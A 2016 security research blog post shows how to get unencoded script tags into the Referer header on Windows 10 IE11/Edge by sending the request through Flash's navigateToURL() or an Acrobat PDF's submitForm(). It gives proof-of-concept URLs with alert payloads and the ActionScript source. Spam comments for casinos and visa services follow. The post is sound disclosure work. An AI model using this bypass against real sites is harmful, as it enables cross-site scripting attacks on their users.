Thursday, October 6, 2016

XSS via Referrer After Anniversary Update

Since the Windows 10 anniversary update, it seems that Microsoft killed some XSS tricks on IE11/Edge. The referrer behavior is one of them.

The following page writes the HTTP_REFERER and document.referrer directly:
https://vulnerabledoma.in/xss_referrer

Previously IE/Edge did not encode the "<> characters in the referrer string. So, we could XSS on that page from the following PoC:
https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>

But since the Windows 10 anniversary update, IE11/Edge encodes it. You will get the following encoded string from that page:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Too bad!
Of course, we can still use Win8.1/7 IE11. But also we want to XSS on Win10, don't you? :D

Today, I would like to introduce a small technique, XSS using the referrer on latest Win10 Edge/IE11.

The technique is very simple. You can easily include "<> string into the referrer if you send the request from Flash's navigateToURL() method, like this:

https://l0.cm/xss_referrer.swf?<script>alert(1)</script>

The ActionScript code is here:
package {
 import flash.display.Sprite;
 import flash.net.URLRequest;
 import flash.net.navigateToURL;
 public class xss_referrer extends Sprite{
  public function xss_referrer() {
   var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
   navigateToURL(url, "_self");
  }
 }
}
As you can see the access result, we can XSS via the Referer request header. But sadly, we cannot XSS via the document.referrer property because it becomes empty. Dang :p

FYI, also I can reproduce it via the submitForm() method of JavaScript for Acrobat API.

I confirmed it on Win10 IE11 with Adobe Reader plugin.

PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>

It seems that the request via plugins is not considered.

That's it. It might be helpful in some cases :)
Thanks!

16 comments:

  1. To do Not Pressure OR Anything, But Have Ever This considered post there is statement PT Lampung Service this is a
    Service HP Bandar Lampung whose looking to do day
    Service iPhone Lampung to this looking then to that is
    Jasa Kursus Service HP I will try it.
    Jasa Kursus Service HP They have jumping places and so that the device other kid's activity.Youtuber Lampung , Thanks ! Visit Back.

    ReplyDelete
  2. That's for sure. He could become the future Paul Scholes at Nachester United, he has the outstanding quality of a midfielder to be a great player.”
    A bizarre penalty took place in the FA รีวิวคาสิโน
    Cup second round when the referees decided to give non-league side Ebbsfleet the penalty despite their players stubbornly falling on their own. Plus, it also contributed to Ebbsfleet's qualification.

    ReplyDelete
  3. What an interesting article! I'm glad i finally found what i was looking for.
    온라인경마
    경마사이트

    ReplyDelete
  4. This an amazing reads, it shows that you actually know what you are talking about, thanks a lot for sharing the elucidate contents. 카지노

    ReplyDelete
  5. Thank you for this work.. Planning to stay in Kenya further for some reasons, however, you must apply for Kenya visa extension then online and check visa required for Kenya.

    ReplyDelete
  6. Wow.. Very informative article thanks for sharing please keep it up.. You can apply for an India tourist visa urgent in some case of emergency and you can also apply for an India visa super urgent, it takes less as compared to sticker visa.

    ReplyDelete
  7. BK8 ของเราคือแบรนด์ คาสิโนออนไลน์ (Casino Online) ที่ใหญ่และดีที่สุดใน ประเทศไทย ทั้งยังสามารถครองใจผู้เล่นมาแล้วหลายล้านรายทั่วประเทศในแถบ เอเชีย เป็นที่รู้จักกันดีในฐานะแบรนด์ การพนัน ชั้นนำ มี เกมคาสิโน หลากหลายที่พร้อมมอบประสบการณ์สุดพิเศษแก่ผู้เล่นแต่ละราย ตอบสนอง การเดิมพัน ได้ง่ายเพียงปลายนิ้วสัมผัสผ่าน คอมพิวเตอร์, แม็บเล็ต และ โทรศัพท์มือถือ ทั้งยังมี โปรโมชั่น, โบนัส และเงินรางวัลสุดพิเศษอีกมากมาย เข้าไปเดิมพันและทำให้วันของคุณเป็นวันที่แตกต่างได้เลยวันนี้!สมัคร bk8thai

    ReplyDelete
  8. Atoz Top News is considered one of the best recognized and popular websites providing high-quality information about the latest technology and gadgets. In addition, AtoZ Top News is one of the top technology-related websites on the internet and one of the most popular technology blogs online. It is primarily a source of articles related to portals on the internet and the latest technology reviews, news, and product reviews.

    ReplyDelete
  9. The whole data is related to window10, the best window for marketing, but I wouldn't say I like to use it for my work because I have been using window7, which is very easy for new marketers who do not have enough experience in SEO. dissertation writing services

    ReplyDelete
  10. It is difficult to choose the best someone to write my assignment because of the vast range of websites available on the internet. They are just as good as the others and you have to make sure that you are getting the best assignment help.

    ReplyDelete
  11. This comment has been removed by the author.

    ReplyDelete
  12. This comment has been removed by the author.

    ReplyDelete